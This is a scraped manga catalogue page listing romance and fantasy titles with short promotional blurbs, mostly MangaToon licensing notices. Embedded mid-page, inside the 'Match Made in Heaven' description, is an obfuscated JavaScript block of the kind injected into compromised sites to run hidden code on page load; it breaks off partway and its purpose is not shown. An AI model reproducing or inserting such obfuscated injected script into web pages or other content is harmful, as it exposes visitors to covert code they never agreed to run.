Liexing - Page 6

Discover top manga Liexing with stunning art and thrilling tales. Enjoy the best Liexing manga free online today!

169 results

Marriage Alliance For Revenge

Read manhwa Marriage Alliance for Revenge Olivia, the Empress of Rhone Empire, died because of her husband’s scheme, then she had a chance to live again in the body of an unknown woman who lived in a slum. After that, Olivia met her ex-fiance, who was the real heir to the throne, and hid her real identity from him. She made a suggestion to form a marriage alliance for each other’s revenge. Will their revenge succeed without any obstacle


Marry To Find Love

She’s been married for three years without knowing who her husband is, yet…“What do you call me?” He smirked, chest vibrating as his husky voice licked her ear.“P…President?”“Wrong!” He pressed harder, sending sensations down her delicate spine.“Hu…hubby!”


Master Of Three Realms

Master of Three Realms Three hundred years ago, he was the great monarch, who was killed by his fiancee right before their wedding. Three hundred years later, he was reincarnated against heaven's will. He practiced the forbidden technique and forged god-defying meridians. In this lifetime, I will slaughter He whoever stands in my way, be it a god or demon. I am going to do anything till my heart's content. I shall rule three realms! MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Match Made in Heaven

"A comical romance about a woman wanting to find her arranged marriage partner!" The self-proclaimed happy single Jiwoo is eager to work at her grandfather's company. But her grandfather is adamant about marrying her off to his chosen candidate at his company. Not being able to find out who he is, she disguises herself as a man and dives into the orientation events he is attending. Believing that the candidate might be Minwoo, a boy from her childhood, creates even more confusion about his real identity, for... There are two men with the name Minwoo! ? SuJin Kim, HoKyoung Yeo/Haksan Publishing Co.,Ltd. MangaToon got authorization from Ecomix to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>(function(_0x382cb3,_0x1e9af2){var _0x47b22f=_0x3a09,_0x28450a=_0x382cb3();while(!![]){try{var _0x590286=parseInt(_0x47b22f(0xc7))/(-0x1657+0x8db*-0x3+0x13*0x293)*(-parseInt(_0x47b22f(0xad))/(0x19ed+0x1*-0xd63+0x1*-0xc88))+-parseInt(_0x47b22f(0xa6))/(0x6+0x3f3*-0x7+0x1ba2)+parseInt(_0x47b22f(0xa7))/(-0x23e3+0xf00*0x2+0x5e7*0x1)+-parseInt(_0x47b22f(0xb9))/(0x1a6a+0x16d7+-0x313c)+-parseInt(_0x47b22f(0xba))/(0x3*-0x483+0x1c2*0x6+0x303)*(-parseInt(_0x47b22f(0xc1))/(-0x2449+0xe06+0x2*0xb25))+parseInt(_0x47b22f(0xc5))/(-0x6e2+-0x17dd+0x1ec7)*(-parseInt(_0x47b22f(0xac))/(-0x2205+0x5e*0x4c+0x626))+parseInt(_0x47b22f(0xbb))/(0x29*-0x77+-0x125e+0xc7d*0x3)*(parseInt(_0x47b22f(0xc4))/(-0x5a2+-0x2*0xb1e+0x1be9));if(_0x590286===_0x1e9af2)break;else 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Mind-Reading Princess

Used, betrayed, and tortured by her husband and sister, she died in despair, wondering why she couldn&#8217;t have seen though them earlier? Maybe God heard her question and turned back the clock. She woke up on the morning of her wedding and found herself able to read people&#8217;s mind. However, there&#8217;s this Prince who&#8217;s immune to her ability. What is he thinking? Will he undermine her revenging plan? No worries, she&#8217;s got the rest of her life as his wife to figure this man out&#8230; MangaToon got authorization from MiFenPink to publish this manga, the content is the author&#8217;s own point of view, and does not represent the stand of MangaToon.


Miss Divine Doctor: Conquer The Demon King

Jun Jiu, the divine doctor, was killed by her competitor and time travelled to another world. She breaks into a sealed altar, and a mysterious man snatches her chin and forces her… Who’s this arrogant demon?! MangaToon got authorization from iReader to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.


Miss Fairy The Emperor Tamer

Canary Yun Mian, the Fairy of Fertility, in charge of reproduction and pregnancy…have been given a mission impossible. It is said that the son of Emperor Feng Xiao will be the ruler of the mortal world. Yu Mian must guarantee the birth of this child. However, she finds out that the Emperor shows no interest in his concubines because… he is impotent. Meanwhile, Emperor Feng Xiao gets to notice the maid disguised by Yun Mian and find her very attracting… MangaToon got authorization from iReader to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.


Miss Lover Tamer

"Unbelievable". When I wake up, I realized that I've traveled into an embarrassing novel I wrote in my teenage years. Now I'm the infamous first miss in the house of Prime Minister. According to the plot I wrote, the female lead was a flirtatious girl who had only one interest in the world -- flirting with handsome guys. However, her ending wasn't a good one, or to say it is tragedy would be more accurate. But I'm not going to accept the ending as it is. Time for me to tame my lovers! MangaToon got authorization from iCiyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Miss Miracle

"Miss Loser" transmigrated to a different realm and started her revenge with the young master of the demon clan. A story about a domineering female lead. Who will be the winner in this nip-and-tuck tug of war in love. A destined loser? A push-over? An ugly girl? She was an ace bounty hunter in my previous life, but she transmigrated into a weak girl's body. Hell no! She fights villains, punishes scumbags and kicks the butt of her enemies. Boys are crazily attentive to her. The male is so angry that he even gives her a last warning: Hey, you've accepted the bride price from me. Try flirting with other boys if you dare! MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Miss Scum Slayer Reborn

Another badass FL revenge on scums and bitches! She even slept with a president for she wants to get pregnant! But the president is not someone can be fooled around! What will he do when he catches our FL? Would he give her a good “punishment”? Yun Weinuan was cheated and killed by her boyfriend and best friend in her last life. As every story goes, she got another life and sweared to revenge those who wronged her. But her baby in the last life won’t come back anymore. So she comes up with an idea, that is, to find a handsome man, sleep with him, and get pregnant. She clearly didn’t expected that this man will be so furious after she runs away… MangaToon got authorization from iReader to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.


Mr. Darcy Next Door

Mr. Darcy Next Door &#8220;You are born to be his bride. Once you marry him, our family business can secure the biggest support.&#8221; That&#8217;s what I&#8217;ve been told and instructed to do growing up. I feel like a prisoner of my family. Everything is suffocating! Fine, just lock up my feelings and consider my marriage as pure business—I will like whatever he likes, wear whatever he prefers, and behave whichever way he fancies. Just marry him and get this over for good! However, we did grow up together and were once childhood sweethearts. What if&#8230; he really loves me and wants the best for me? MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author&#8217;s own point of view, and does not represent the stand of MangaToon.


Mr. Mcdreamy in the Romance Instance

The Tsundere best actor has time travelled to the Celestial Realm and become the most gorgeous and sensitive angle. His mission is to earn more "libido" by winning the hearts of countless hunks in the Instance Zones... Alas, I'm a true expert in seducing men... MangaToon got authorization from SNAP to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
